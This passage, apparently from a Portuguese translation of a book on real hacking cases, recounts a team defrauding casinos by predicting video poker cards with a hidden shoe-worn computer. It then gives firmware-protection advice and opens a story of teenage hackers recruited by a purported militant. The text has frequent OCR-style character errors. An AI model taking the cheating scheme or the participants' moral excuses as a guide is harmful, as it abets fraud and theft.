que conheci na prisao e que realmente substituiam o firmware. Eu queria saber como eles conseguiam fazer 
isso com tanta rapidez a ponto de nao serem pegos. Alex imaginou que essa era urna abordagem de engenharia 
social, que eles haviam entrado em acordo com a seguranęa e pagavam alguem dentro do cassino. Tambem 
chegou a pensar que eles podiam ate substituir a chave mestra, que deveriam comparar com o chip da maquina. 

O bonito na invasao de sua equipe, Alex insistiu, era que eles nao tiveram de mudar o firmware e que sua 
abordagem oferecia muito mais desafio. 

A equipe nao podia continuar ganhando tanto. Eles imaginaram que "era claro que alguem somaria dois 
mais dois e diria 'ja vi esse cara antes 1 . Comeęamos a ficar assustados, com medo de sermos pegos". 

Alem de estarem sempre com medo de ser pegos, eles tambem se preocupavam com a questao dos 
impostos; para qualquer um que ganhe mais de 1,200 dólares o cassino pede o CPF e informa o pagamento a 
Secretaria da Fazenda. Mikę diz que "se o jogador nao apresentasse o documento, supunhamos que os impostos 
seriam deduzidos diretamente do pagamento do premio, mas para descobrir isso poderiamos chamar a atenęao 
para nós, e nao queriamos isso". Pagar os impostos nao era "o grandę problema", mas "comeęa a criar um 
registro de que voce esta ganhando quantias incalculaveis de dinheiro. Entao, muito da logistica consistia em 
'como ficamos sob o radar?"'. 

Eles precisavam inventar urna abordagem diferente. Nao demorou muito, e comeęaram a conceber urna 
nova ideia. 

Nova abordagem 

A equipe tinha dois objetivos desta vez: desenvolver um metodo que lhes permitisse vencer em maos como 
fuli house, straight ou flush, de modo que os pagamentos nao fossem tao vultosos para atrair a atenęao. E 
tambem fazer isso de maneira mais cómoda e se expondo menos, evitando ter de correr ate o telefone antes de 
cada jogada. 

Como os cassinos ofereciam um numero limitado de maquinas japonesas, dessa vez eles escolheram urna 
maquina de uso mais abrangente, um tipo fabricado por urna empresa norte-americana. Eles a desmontaram da 
mesma forma que a outra e descobriram que o gerador de numeros aleatórios era muito mais complexo; a 
maquina usava dois geradores que operavam em combinaęao, em vez de um, "Os programadores estavam 
muito mais conscientes das possibilidades de invasao", concluiu Alex. 

Mas novamente os quatro descobriram que os designers tinham cometido um erro crucial. "Aparentemente, 
eles tinham lido um trabalho que dizia que voce aprimora a qualidade da aleatoriedade se acrescentar um 
segundo registro, mas fizeram isso da maneira errada." Para determinar qualquer carta, um numero do primeiro 
gerador de numeros aleatórios era acrescentado a um 
numero do segundo. 

A maneira certa de projetar isso e fazer com que o segundo gerador itere — ou seja, mude seu valor — 
depois que cada carta e distribuida. Os projetistas nao fizeram isso; eles tinham programa- 
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do o segundo registro para iterar somente no comeęo de cada mao, de modo que o mesmo numero fosse 
acrescentado ao resultado do primeiro registro para cada carta distribuida. 

Para Alex, o uso de duas registradoras tomava o desafio uma "coisa criptografada", e ele concluiu que isso 
era parecido com uma medida as vezes usada em mensagens codificadas. Embora tivesse certo conhecimento 
sobre o assunto, nao era o suficiente para chegar a uma soluęao. Comeęou a frequentar a biblioteca de uma 
universidade próxima para estudar. 

Se os projetistas tivessem lido alguns livros sobre sistemas criptografados com mais cuidado, nao 
teriam cometido esse erro. Tambem deveriam ter sido mais metódicos ao testar os sistemas 
usados para invadir, como nós estavamos fazendo. Qualquer aluno que estivesse se formando em 
ciencia da computaęao provavelmente poderia escrever o código para fazer o que estavamos 
tentando fazer, uma vez que ele entende o que e exigido. A parte mais engenhosa era imaginar 
algoritmos para fazer a busca mais rapidamente, de modo que só demorasse segundos para voce 
saber o que estava acontecendo; se voce llzesse isso sem conhecimento tecnico, poderia levar 
algumas horas para chegar a soluęao. 

Somos muito bons programadores, todos nós ainda ganhamos a vida fazendo isso, entao 
chegamos a algumas otimizaęóes muito inteligentes. Mas eu nao diria que era trivial. 

Lembro-me de um erro semelhante cometido por um programador na Norton (antes de ser adquirida pela 
Symantec) que havia trabalhado em seu produto Diskreet, um aplicativo que permitia a um usuario criar drives 
yirtuais criptografados. O programador implementou o algoritmo incorretamente — ou talvez intencionalmente 
—, de forma que o espaęo para a chave de criptografia foi reduzido de 56 para 30 bits. O padrao de criptografia 
de dados do govemo federal usava uma chave de 56 bits, considerada inviolavel, e a Norton dizia a seus 
clientes que seus dados eram protegidos por esse padrao. Em yirtude do erro do programador, os dados do 
usuario na yerdade estavam sendo criptografados com apenas 30 bits, cm vez de 56. Mesmo naqueles tempos, 
era possivel foręar uma chave de 30 bits. Qualquer pessoa que usasse esse produto trabalhava com uma falsa 
noęao de seguranęa: um atacante poderia deriyar sua chave num periodo razoavel e ter acesso aos dados do 
usuario. A equipe tinha descoberto o mesmo tipo de erro na programaęao da maquina. 

Ao mesmo tempo, os rapazes estavam trabalhando num programa de computador que lhes permitiria vencer 
sua nova maquina-alvo. Eles estavam pressionando Alex para usar um metodo que nao exigisse mais correr ate 
o telefone publico mais próximo. A resposta acabou vindo da ideia apresentada no Eudaemonic pie. um 
computador 'portatil'. Alex concebeu um sistema feito com um computador em miniatura construido a partir de 
uma pequena płaca de microprocessador que Mikę e Marco encontraram em um catalogo — e, com ele, havia 
um botao de controle que se encaixava no sapato e um yibrador silencioso, como aqueles comuns em celulares 
hoje. Eles se referiam ao sistema como "computador de bolso". 

"Tinhamos de ser inteligentes para fazer isso num chip pequeno com uma memória pequena", disse Alex. 
"Inyentamos um hardware bom para fazer tudo se encaixar no sapato e que fosse ergonómico.” 
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(Por ergonómico, neste contexto, acho que ele ąueria dizer peąueno o suficiente para poder andar sem 
mancar!) 

O novo ataąue 

A eąuipe comeęou a experimentar o novo esąuema, o que foi muito angustiante. Sem duvida, agora eles 
nao precisavam mais correr para dar um telefonema antes de cada yitória, o que sinalizava um comportamento 
suspeito. Mas mesmo com toda a pratica adquirida nos ensaios no 'escritório', a noite de estreia significava 
atuar na frente de um publico consideravel de seguranęas sempre desconfiados. 

Dessa vez, o programa foi concebido de modo que eles pudessem jogar em urna maquina por mais tempo, 
ganhando urna serie de quantias menores, menos suspeitas. Alex e Mikę sentem certa tensao ao contarem como 
tudo aconteceu. 

Alex: Geralmente eu colocava o computador, que parecia um pequeno radio 
transistor, em meu bolso. Puxavamos um fio do computador ate la embaixo, dentro 
da meia, nesse dispositivo no sapato. 

Mikę: Eu o prendia no meu tornozelo. Fiz os dispositivos de pequenos pedaęos 
de breadboard', que tinham aproximadamente 6,5 centimetros quadrados, com um 
botao de miniatura. E o costurayamos a um pedacinho de elastico que prendiamos 
em volta do dedao. Entao, voce fazia um furo numa palmilha para mante-lo no lugar, 
em seu sapato. Só era desconfortavel se voce o usasse o dia todo; nesse caso, poderia 
se tornar insuportavel. 

Alex: Entao, voce entra no cassino, tenta parecer calmo, age como se nao houvesse 
nada, sem fios em suas calęas. Voce sobe, comeęa a jogar. Tinhamos um código, um 
tipo de código Morse. Voce coloca dinheiro para ter credito, de modo que nao precise 
ficar introduzindo moedas, e entao comeęa a jogar. Quando as cartas aparecem, voce 
clica o botao no sapato para entrar com as cartas que estavam aparecendo. 

O sinal do botao do sapato vai para o computador que esta no bolso de minha calęa. 

Geralmente, nas maquinas mais antigas, eram necessarias de sete a oito cartas 
para entrar em sincronia. Voce tem cinco cartas; seria comum pegar mais tres para 
manter os pares. Entao, voce pega outras tres, ficando com oito cartas. 

Mikę: O código para acessar o botao no sapato era binario, e tambem era usada urna 
tecnica de compressao, do tipo conhecido por código Huffman. Entao, longo-curto 
seria um-zero, um dois binario. Um longo-longo seria um-um, um tres binario, e 
assim por diante. Nenhuma carta exigia mais de tres toques. 

Alex: Se voce pressionasse o botao por tres segundos, tudo era cancelado. E [o 
computador] lhe daria pequenos sinais — dup-dupdup, por exemplo, significaria 
"Tudo bem, estou pronto para a entrada". Tinhamos praticado antes — voce precisaya 


* Materiał usado em um laboratório de hardware para construir protótipos de circuitos eletrónicos (N. da R. T.). 
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se concentrar e aprender a fazer isso. Depois de um tempo podiamos dar toques, 
mesmo enąuanto estayamos conversando com um atendente do cassino. 

Uma vez, entrei com o código para identificar cerca de oito cartas, que seria o 
suficiente para eu sincronizar com cerca de 99 por cento de certeza. Entao, depois 
de alguns segundos ou um minuto, aproximadamente, o computador tocaria tres 
vezes. 

Eu estava pronto para agir. 

Nesse momento, o computador no bolso tinha encontrado o lugar no algoritmo que representava as 
cartas distribuidas. Como seu algoritmo era o mesmo que o da maquina de videopóquer, para cada nova 
mao de cartas o computador saberia' quais as cinco cartas adicionais que estavam na espera, uma vez 
que o jogador tinha selecionado o descarte e sinalizaria as cartas a serem mantidas para ganhar Alex 
continuou: 

O computador lhe diz o que fazer, enyiando sinais para um yibrador em seu bolso. 
Conseguimos yibradores tirando-os de pagers velhos. Se o computador quer que voce 
segure a terceira e a quinta cartas, emitira um bipe, biiiipe, bipe, biiiiipe, que voce sente 
como yibraęoes em seu bolso. 

Calculamos que, se Jogassemos com cautela, teriamos entre SO e 40 por cento de 
pagamento extra, o que significa uma yantagem de 40 por cento em cada mao. Isso a uma 
quantia enorme — os melhores Jogadores de vlnte-e-um do mundo chegam a cerca de dois 
e meio por cento. 

Se voce esta Jogando em uma maquina de 5 dólares, colocando cinco moedas por vez, duas 
por minuto, pode ganhar 25 dólares por minuto. Em mela hora voce poderia facilmente 
ganhar mil dólares. As pessoas sentam-se e tem essa sorte todos os dias. Talvez 5 por cento 
das pessoas que se sentam e Jogam durante meia hora possam fazer bem isso. Mas elas nao 
fazem isso toda vez. Estayamos ganhando esses 5 por cento todas as vezes. 

Sempre que ganhavam muito num cassino, mudavam para outro. Cada um costumava ganhar quatro 
ou cinco vezes seguidas. Quando voltavam para o mesmo cassino em outra viagem, um mes depois, iam 
num horario diferente, para encontrar funcionarios de turnos diferentes, pessoas que provavelmente nao 
os reconheceriam, Eles tambem comeęaram a frequentar cassinos de outras cidades — Reno, Atlantic 
City, entre outros. 

As yiagens, o jogo, as yitórias gradualmente se tornaram rotina. Mas, numa ocasiao, Mikę achou 
que o momento que todos temiam havia chegado. Ele tinha acabado de 'acertar na mosca' e estava 
jogando nas maquinas de 25 dólares pela primeira vez, o que aumentava a tensao, porque quanto mais 
alto o valor das maquinas, mais de perto eram yigiados. 

Eu estava um pouco ansioso, mas as coisas estavam indo melhor do que eu previa. Ganhei 
cerca de cinco mil dólares em pouco tempo. Entao, um funcionario 
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grandalhao, de dar medo, bateu no meu ombro. Olhei para ele sentindo um frio no 

estómago, Pensei: "Ja era". 

"Estou vendo que voce esta Jogando bastante", disse ele. "Voce prefere rosa ou 

verde?" 

Se tivesse sido comigo, pensaria: "O que e isso? As opęoes de cor que terei depois que eles acabarem comigo?". 
Acho que eu teria deixado todo o meu dinheiro la e tentaria escapar do lugar. Mikę diz que ele era experiente o 
suficiente, aquela altura, para manter a calma. 

O homem disse: "Queremos lhe dar uma caneca de presente". 

Mikę escolheu a verde. 

Marco tambem teve seu momento de tensao. Estava esperando receber a mao que havia ganho, quando um 
supervisor que ate entao nao tinha notado debruęou-se sobre seus ombros. Voce dobrou para cinco mil dólares — que 
sorte", ele disse, surpreso. Uma senhora na maquina ao lado falou com uma voz estridente: "Nao... nao foi... sorte". O 
supervisor Ficou parado. O que ela disse levantou suspeita. "Foram as bolas", ela retrucou. O supervisor sorriu e foi 
embora. 

Num periodo de cerca de tres anos, eles altemaram-se entre empregos de consultoria legitimos, para manter suas 
habilidades e seus contatos, e escapadas esporadicas para encher os bolsos com as maquinas de videopóquer. Tambem 
compraram mais duas maquinas, inclusive o modelo mais usado de videopóquer, e continuaram a atualizar seu 
software. 

Nas viagens, os tres integrantes da equipe dirigiam-se a cassinos diferentes, "para nao irmos como um bando", disse 
Alex. "Fizemos isso uma ou duas vezes, mas foi estupidez." Embora eles tivessem combinado que cada um sempre 
saberia onde estavam os outros, as vezes um deles fugia para uma cidade para jogar sem contar aos outros. Mas eles só 
jogavam em cassinos, e nunca em lugares como 7-Elevens ou supermercados, porque "eles costumavam pagar muito 
pouco". 

Pego! 

Alex e Mikę tentavam ser disciplinados para aderir a "certas regras que sabiamos que iam reduzir a 
probabilidade de sermos notados. Uma delas era nunca chegar a um lugar para ganhar dinheiro demais, nunca 
ftcar por tempo demais, nunca muitos dias seguidos". 

Mas Mikę levou a noęao de disciplina ainda mais a serio, e achava que os outros dois nao estavam tomando 
cuidado suficiente. Ele aceitava ganhar um pouco menos por hora, para parecer um jogador tipico. Se tivesse 
dois ases numa rodada e o computador lhe dissesse para descartar um ou ambos para ter uma mao melhor — 
digamos, tres valetes —, ele nao fazia isso. Todos os cassinos mantem cameras Eye in the sky numa cabine de 
seguranęa, no andar superior do cassino, que controlam um conjunto de cameras de seguranęa que podem ser 
yiradas, focar e dar um zoom, procurando trapaceiros, funcionarios desonestos e outros que cedam a tentaęao 
diante de todo aquele dinheiro. Se um dos yigias ftcasse espiando sua maquina por alguma 
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razao, notaria imediatamente alguma coisa suspeita, visto que nenhum jogador desistiria de 
um par de ases. Ninguem que nao estivesse trapaceando poderia saber que haveria uma mao 
melhor na espera. 

Alex nao era tao detalhista. Marco era menos ainda. "Marco era confiante demais", na opiniao 
de Alex. 

Ele era muito esperto, autodidata; nao concluiu o ensino medio, mas era um desses 
caros brilhantes do Leste Europeu. E audacioso. 

Ele sabia tudo sobre computadores, mas achava que os cassinos eram estupidos. Era 
facil pensar desse modo, porąue essa gente estava nos deixando levar multa grana. 

Mas, mesmo assim, acho que ele era confiante demais. 

Ele nao se importaya em se arriscar e tambem nao se encaixava no perlił porque 
parecia um adolescente estrangeiro. Entao, acho que podia levantar suspeita, E nao 
ia com uma namorada ou esposa, o que o teria ajudado a disfaręar melhor. 

Acho que ele acabou fazendo coisas que chamaram a atenęao. Mas tambem, a medida que o tempo 
foi passando e ficamos mais corajosos, evoluimos e comeęamos a jogar 
em maquinas mais caras, que pagayam melhor, e isso, novamente, torna a operaęao 
mais arriscada. 

Embora Mikę discorde, Alex parecia estar sugerindo que todos eles gostavam de correr riscos e 
extrapolavam os limites para ver ate onde conseguiam chegar. Como ele diz: "Basicamente, acho 
que voce sempre aumenta o risco". 

O dia chegou quando, em um minuto. Marco estava jogando numa maquina em um cassino e, 
no minuto seguinte, foi cercado por seguranęas que o ergueram e o empurraram para uma sala de 
entrevistas nos fundos. Alex descreveu a cena: 

Foi muito assustador, porque voce ouve histórias sobre esses caras que espancam as 
pessoas. Eles sao famosos por pensarem; M Dane-se a policia; nós mesmos vamos 
dar conta disso". 

Marco estava tenso, mas era muito durao. De fato, de algum modo estou contente por ter 
sido ele, e nao outro de nós, porque acho que só ele estava mais preparado para 
enfrentar aquela situaęao. Pelo que sei, ele lidou com as coisas como se estivesse no 
Leste europeu. 

Marco demonstrou lealdade e nao nos entregou, Ele nao falou de parceiro nenhum 
nem nada parecido. Ficou nervoso e chateado, mas foi firmę e disse que estava 
atuando sozinho. 

Ele disse: "Olhem, estou preso, voces sao da policia. Qual e o acordo?". 

Era um tipo de interrogatório, como aquele feito na justięa, só que eles nao sao da 
policia e nao tern autoridade legał, o que e bem estranho, Eles ficaram questionando, 
mas nao o maltrataram. 
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Eles tiraram uma foto dele, diz Alex, e confiscaram o computador e todo o dinheiro que ele tinha, cerca de 
sete mil dólares em dinheiro. Depois talvez de uma hora de interrogatório, ou ate mais — ele nao sabe dizer ao 
certo —, fmalmente eles o liberaram, 

Marco ligou para seus parceiros a caminho de casa. Ele parecia alucinado. Disse: "Eu ąuero contar o que 
aconteceu. Ferrei tudo*. 

Mikę foi direto para o escritório deles. "Alex e eu piramos quando ouvimos o que aconteceu. Comecei a 
destruir as maquinas e a espalhar os pedaęos pela cidade." 

Alex e Mikę estavam chateados com Marco pelos riscos desnecessarios que correu. Ele nao pressionava o 
botao no sapato como os outros dois, insistindo teimosamente em levar o dispositivo no bolso da jaqueta e 
apertando-o com a mao. Alex descreveu Marco como um cara que "achava que os seguranęas eram tao imbecis 
que ele podia continuar apertando o envelope quantas vezes quisesse, bem embaixo do nariz deles". 

Alex esta convencido de que sabe o que aconteceu, embora nao estivesse presente. (De fato, os outros tres 
nao sabiam que Marco tinha ido ao cassino, apesar do acordo de avisar os outros sobre seus planos.) O que 
Alex imaginou foi o seguinte: "Eles só viram que ele estava ganhando uma quantidade ridicula e que havia 
algo acontecendo com a mao dele". Marco simplesmente nao se preocupou em pensar no que poderia levar o 
pessoal da seguranęa a nota-lo. 

Aquele foi o firn de tudo para Alex, embora ele nao estivesse totalmente seguro a respeito dos outros- 
"Nossa decisao no inicio foi que, se algum de nós fosse pego, parariamos." Ele disse: "Todos nós respeitamos o 
acordo, ate onde sei". E, depois de um momento, acrescentou com menos certeza: "Pelo menos eu". Mikę 
concorda, mas nenhum deles nunca perguntou diretamente a Marco. 

Os cassinos nao costumam abrir processo por golpes como esse. "O motivo e que eles nao querem divulgar 
publicamente que tern essas vulnerabilidades", explica Alex. Por isso, geralmente e: "Suma da cidade antes de 
escurecer E se voce concordar em nunca mais pór o pe num cassino, entao o deixaremos ir", 

Consequencias 

Cerca de seis meses depois, Marco recebeu uma carta dizendo que as acusaęóes contra ele nao. seriam 
divulgadas na imprensa. 

Os quatro ainda sao amigos, embora eles nao sejam tao próximos hoje em dia. Alex imagina ter ganho 300 
mil dólares com a aventura, e parte dessa quantia foi para Larry, como eles tinham combinado. Os tres 
parceiros que iam aos cassinos, que assumiram todo o risco, inicialmente disseram que iriam dividir igualmente 
o dinheiro entre si, mas Alex acha que Mikę e Marco provavelmente levaram 400 mil dólares a meio milhao 
cada um. Mikę nao iria admitir ter saido com nada mais que 300 mil dólares, mas reconhece que Alex 
provavelmente tenha levado menos que ele. 

Eles fizeram isso durante aproximadamente tres anos. Apesar do dinheiro, Alex estava contente por ter 
terminado: "Num sentido, fiquei aliviado. Aquilo foi perdendo a graęa. Acabou se tomando uma especie de 
emprego. Um emprego arriscado", Mikę tambem nao ficou triste por ter parado, reclamando, de maneira nao 
muito convincente, que "exigiu um esforęo extremo". 

No inicio, ambos ficaram relutantes em contar a historia, mas depois assumiram a tarefa com prazer. E por 
que nao? Nos dez anos, aproximadamente, depois que isso aconteceu, nenhum dos 
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ąuatro tinha dito nenhuma palavra sobre o assunto, a nao ser as esposas e a namorada, que faziam parte da 
trama, Ter contado pela primeira vez, protegidos pelo acordo de anonimato absoluto, pareceu um alivio. Eles 
obviamente gostaram de reviver os detalhes, e Mikę admitiu: "Foi urna das coisas mais excitantes que eu ja 
vivi", 

Alex provavelmente fala por todos quando expressa o que pensa da aventura: 

Nao me sinto mai com o dinheiro que ganhei. E urna gota num balde para aquela 
industria, Tenho de ser honesto: nunca nos sentimos comprometidos moralmente, 
porque sao cassinos. 

Era facil racionalizar. Estavamos roubando dos cassinos, que roubam de senhoras 
oferecendo jogos que elas nao podem ganhar. Em Vegas, parecia que as pessoas 
ficavam grudadas em maquinas de sugar dinheiro, que sugavam a vida delas aos 
poucos. Entao, nos sentiamos como se estivessemos revidando ao Grandę Irmao, e 
nao surrupiando os premios de urna pobre senhora. 

Eles colocam um Jogo la que diz: "Se voce escolher as cartas certas, ganha". Nós 
escolhiamos as cartas certas. Eles so nao esperavam que alguem fosse capaz de fazer 

isso. 

Alex diz que nao tentaria nada parecido hoje. Mas suas razoes podem nao ser as que voce espera: "Tenho 
outras formas de ganhar dinheiro. Se eu estivesse financeiramente na mesma posięao de antes, provavelmente 
tentaria de novo". Ele acha que o que fez se justifica. 

Nesse jogo de gato e rato, o gato aprende continuamente os novos truques do rato e toma as medidas 
adequadas. As maquinas caęa-niqueis hoje em dia usam software com um projeto muito melhor; eles nao tern 
certeza de que teriam sucesso se tentassem invadi-las novamente. 

Alem disso, nunca havera urna soluęao perfeita para qualquer questao de seguranęa tecnológica. Alex 
exp5e muito bem a questao: "Toda vez que alguem diz que 'ninguem se dara ao trabalho de fazer isso', havera 
sempre um garoto na Finlandia que se dara ao trabalho". 

E nao apenas na Finlandia, mas nos Estados Unidos tambem. 

Insight 

Na decada de 1990, os cassinos e projetistas de maquinas de jogo ainda nao tinham imaginado algumas 
coisas que mais tarde ficaram óbvias. Um pseudogerador de numeros aleatórios nao gera realmente numeros 
aleatórios. Em vez disso, ele armazena urna lista de numeros em urna ordem aleatória. Nesse caso, urna lista 
muito longa: de 2 elevado a 32 a potencia ou um bilhao de numeros. No inicio de um ciclo, o software seleciona 
aleatoriamente um lugar na lista. Mas, depois disso, ate comeęar um novo ciclo de jogo, ele usa os numeros 
que se seguem na lista, um após o outro. 

Ao fazerem a engenharia inversa do software, os rapazes conseguiram a lista, de qualquer ponto conhecido 
na lista 'aleatória', eles podiam determinar cada numero subseqiiente a ela e, conhecendo tambem a taxa de 
iteraęao de determinada maquina, poderiam calcular em quantos minutos e segundos a maquina exibiria um 
royal flush. 
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Medidas preventivas 

Os fabricantes de produtos que usam chips ROM e software deveriam prever problemas de seguranęa. E 
em toda empresa que usa software e produtos informatizados — o que hoje em dia acontece em qualquer 
empresa, ate nas micros, em que ha apenas uma pessoa — e arriscado supor que as pessoas que constroem seus 
sistemas pensaram em todas as yulnerabilidades. Os programadores de software na maquina caęa-niqueis 
japonesa tinham cometido um erro ao nao pensarem antecipadamente que tipos de ataques poderiam ocorrer. 
Eles nao adotaram nenhuma medida de seguranęa para impedir as pessoas de chegarem ao firmware. Deveriam 
ter previsto que alguem poderia ter acesso a uma maquina, remover a memória ROM, ler o firmware e 
recuperar as instraęoes do programa que dizem a maquina como funcionar Mesmo que considerassem essa 
possibilidade, provavelmente iriam supor que conhecer o funcionamento da maquina nao seria suficiente, 
imaginando que a complexidade computacional para invadir o gerador de numeros aleatórios impediria 
qualquer tentativa — o que pode muito bem ser verdadeiro hoje, mas nao na epoca, 

Entao, sua empresa negocia produtos de hardware que contem chips de computador O que voce deveria 
fazer para garantir proteęao adequada contra o concorrente que quer ver seu software, contra a empresa 
estrangeira que quer fazer uma imitaęao barata ou contra o hacker que quer engana-lo? 

O primeiro passo; dificulte o acesso ao firmware, Varios sao os procedimentos possiveis, inclusive: 

• Compre chips de um tipo projetado para impedir ataques. Varias empresas comercializam chips 
especificamente projetados para situaęoes em que a possibilidade de ataque e alta. 

• Use chips on-board — um design em que o chip esta inserido na płaca de circuito e nao pode ser 
removido. 

• Cole o chip na płaca com epóxi, de modo que, se tentarem remove-lo, ele quebre. Um aprimoramento 
dessa tecnica exige que se acrescente pó de aluminio no epóxi; se um invasor tentar remover o chip 
aquecendo o epóxi, o aluminio destruira o chip. 

• Use um design bali grid array (BGA), Nele, os conectores nao saem das laterais do chip, mas ficam 
embaixo dele, dificultando, se nao tomando impossivel, captar um fluxo de sinais do chip enquanto 
esta fixo no lugar, na płaca. 

Outra medida que pode ser adotada e raspar qualquer informaęao identificadora do chip, de modo que o 
atacante nao tenha acesso a informaęoes sobre o fabricante e o tipo dele. 

Uma pratica bastante comum, usada por fabricantes de maquinas de videopóquer, exige o uso de 
yerificaęao de soma (hashing) — inclusive uma rotina de yerificaęao de soma no software. Se o programa for 
alterado, a soma de yerificaęao nao sera correta, e o software nao ira operar o dispositivo. Entretanto, hackers 
especializados, que conhecem essa abordagem, simplesmente yerificam o software para conferir se foi incluida 
uma rotina de yerificaęao de soma e, se encontram uma, a desatiyam. Por isso, um ou mais metodos que 
protegem o chip fisicamente constituem um piano muito melhor. 
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O resultado 

Se o firmware e de sua propriedade e valioso, consulte as melhores fontes de seguranęa para descobrir 
ąuais as tecnicas que os hackers estao usando atualmente. Mantenha seus projetistas e programadores 
atualizados com as informaęoes mais recentes. E confirme se eles estao tomando as medidas devidas para 
atingir o mvel mais alto de seguranęa, proporcional ao custo. 
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Quando os terroristas ligam 


Nao sei por que continuei fazendo isso. Natureza compulsiva? Sede de dinheiro? 
Sede de poder? Posso citar varias possibilidades. 

neOh 


O hacker de 20 anos que assina como Comrade esta descansando esses dias em uma propriedade sua e do 
irmao em uma regiao agradavel de Miami. O pai mora com eles, mas só porąue o irmao ainda e menor e o 
Child Services insiste que haja um adulto morando na casa ate o menino completar 18 anos. Os irmaos nao 
ligam, e o pai tern um apartamento em outro lugar, para onde se mudara quando chegar a hora. 

A mae de Comrade morreu dois anos atras, deixando a casa para os Filhos, porque ela e o pai dos meninos 
eram divorciados. Ela deixou algum dinheiro tambem. O irmao dele frequenta a escola, mas Comrade esta "só 
flauteando". A maioria dos familiares desaprova isso, diz ele, "mas eu nao ligo realmente". Quando se e muito 
jovem e se passa pela prisao — na verdade, a pessoa mais nova que tinha sido condenada por crime federal 
como hacker —, a experiencia tende a mudar seus valores. 

O hacking nao conhece fronteiras intemacionais, e claro, por isso nao faz diferenęa que neOh, o amigo 
hacker de Comrade, esteja a cerca de 4.500 quilómetros de distancia, Foi o hacking que os uniu e os fez 
resvalar para um caminho que, mais tarde, os levou a presumir que serviam a causa do terrorismo intemacional 
— porque promoviam invasoes a sistemas de computador altamente sensiveis. Hoje em dia, e muito dificil 
suportar essa carga. 

Um ano mais velho que Comrade, neOh usa "computadores desde que eu pude alcanęar o teclado". O pai 
dele gerenciava uma loja de hardware de computador e levava o menino em visitas a clientes; ele sentava no 
colo do pai durante as negociaęóes de venda. Aos 11 anos, ja estava escrevendo código de dBase para a 
empresa do pai. 
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Em algum momento nesse percurso, neOh apareceu com uma cópia do livro Takedown (Hyperion Press, 
1996), que 6 um relato bastante impreciso de minhas exploraęoes de hacking, de meus tres anos na estrada e do 
FBI atras de mim- neOh ficou fascinado pelo livro: 

Voce me inspirou. Voce e meu mentor ferrado. Leio tudo o que e possfyel sobre o que voce fez. Eu 

queria ser uma celebridade como voce. 

Essa foi a motivaęao que o transformou em hacker. Ele decorou sua sala com computadores, centrais de 
rede e uma bandeira de pirata de 1,80 m e comeęou a seguir meus passos. 

neOh comeęou a acumular sólidos conhecimentos e capacidades de hacker. As habilidades vieram 
primeiro, a discrięao, mais tarde- Usando um termo que os hackers costumam empregar para designar um 
jovem que ainda e iniciante, ele explicou: "Em meus dias de script kiddie*, eu desfigurava sites Web e 
colocava meu e-mail verdadeiro". 

Ele navegava por sites da Internet Relay Chat (IRC — salas de chat da Internet em que as pessoas com 
interesses comuns podem se reunir on-line e trocar informaęao em tempo real — pesca com vara de carretel, 
avioes antigos, fabricaęao caseira de cerveja ou qualquer um entre milhares de outros assuntos, inclusive 
hacking. Quando voce digita uma mensagem num site IRC, todos os que estao on-line naquele momento leem 
o que voce escreveu e podem responder. Embora muita gente que usa o IRC regularmente pareęa nao ter 
ciencia disso, as comunicaęoes podem ser feitas com facilidade. Acho que os logs devem agora conter quase 
tantas palavras quanto todos os livros da Biblioteca do Congresso — e um texto digitado na pressa, sem se 
pensar muito na posteridade, pode ser recuperado mesmo anos depois. 

Comrade estava passando o tempo em alguns desses sites IRC quando fez amizade com neOh, que estava 
bem distante dele. Os hackers freqiientemente formam alianęas para trocar informaęoes e realizar ataques em 
grupo. neOh, Comrade e outro garoto decidiram criar seu próprio grupo, que eles chamaram de Keebler Elves. 
Alguns outros hackers tiveram permissao para participar das conversas do grupo, mas os tres membros 
originais mantiveram segredo de seus ataques mal-intencionados. "Estavamos invadindo sites do govemo por 
diversao", disse Comrade. Na sua estimativa, eles invadiram "algumas centenas" de sites de govemos 
supostamente seguros. 

Inumeros canais de IRC sao bares onde os hackers de diferentes tipos se reunem. Um deles em particular, 
uma rede chamada Efhet, e um site que Comrade descreve como "nao exatamente o submundo do computador 
— e um grupo muito grandę de servidores". Mas dentro da Efhet havia alguns canais menos conhecidos, 
lugares em que voce nao fazia o que queria, mas tinha de seguir instruęoes de algum outro black-hat** cuja 
confianęa voce tinha conquistado. Aqueles canais, diz Comrade, eram o "submundo". 

Khalid, o terrorista, tern certo encanto 

Por volta de 1998, nesses canais "do submundo", Comrade comeęou a bater papo com um cara que usava o 
codinome RahulB. (Mais tarde ele tambem usaria Rama3456.) "Sabia-se que ele queria 

* Pessoas que tern como objetivo obter acesso da maneira mais facil posslvel, independentemente de quem seja 
o alvo ou a informaęao (N. da R. T.). 

** Hackers que inyadem, danificam, alteram e furtam informaęoes em beneficio próprio (N. da R. T.). 
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hackers para invadir computadores do govemo e das Foręas Armadas — sites .gov e .mil", disse Comrade. 
"Havia rumores de que ele trabalhava para Bin Laden. Isso foi antes de 11 de setembro, ąuando Bin Laden 
ainda nao era um nome que se ouvia em noticiarios todo dia." 

Eventualmente, Comrade cruzou com o homem misterioso, que ele viria a conhecer como Khalid Ibrahim. 
"Conversei com ele algumas vezes |no IRC] e urna vez pelo telefone." O homem tinha um sotaque estrangeiro 
e, "sem duvida, parecia ser urna conexao do exterior". 

neOh tambem era visado. Com ele, Khalid era mais direto e claro. neOh recorda: 

Por volta de 1999, recebi um e-mail de um homem que se dizia militante e allrmava estar no 

Paąuistao. Ele deu o nome Khalid Ibrahim. Disse-me que trabalhava para militantes 

paquistaneses. 

Alguem que procurasse garotos ingenuos que sao hackers realmente se envolveria em urna causa terrorista 

— mesmo antes de 11 de setembro? A primeira vista, a ideia parecia absurda. Esse homem mais tarde alegaria 
ter estudado nos Estados Unidos, feito um pouco de hacking e se associado a hackers enquanto estava no pais. 
Entao, ele pode ter conhecido, ou pensado conhecer, alguma coisa do modo de pensar do hacker. Todo hacker 
e, de urna maneira ou de outra, um rebelde que vive padroes diferentes e adora vencer o sistema. Se voce quiser 
atrair hackers, talvez o pote de mel seja anunciar que tambem viola regras e e um outsider. Entao, isso nao seria 
urna tolice tao grandę, afinal. Talvez ate tomasse sua historia mais digna de credito, e seus pretendidos aliados 
muito menos cautelosos e desconfiados. 

E Khalid tinha o dinheiro. Ofereceu mil dólares a neOh para entrar em redes de computador de urna 
universidade chinesa — um lugar a que neOh se refere como MIT da China — e fomecer-lhe arquivos com 
dados de alunos. Provavelmente isso era um teste tanto da capacidade de neOh como hacker quanto de sua 
criatiyidade: como voce entra num sistema de computaęao quando nao le a linguagem? Ainda mais dificil: 
como voce faz a engenharia social a seu modo quando nao fala a lingua? 

Para neOh, a questao linguistica nao era barreira. Ele comeęou navegando por sites da IRC usados por um 
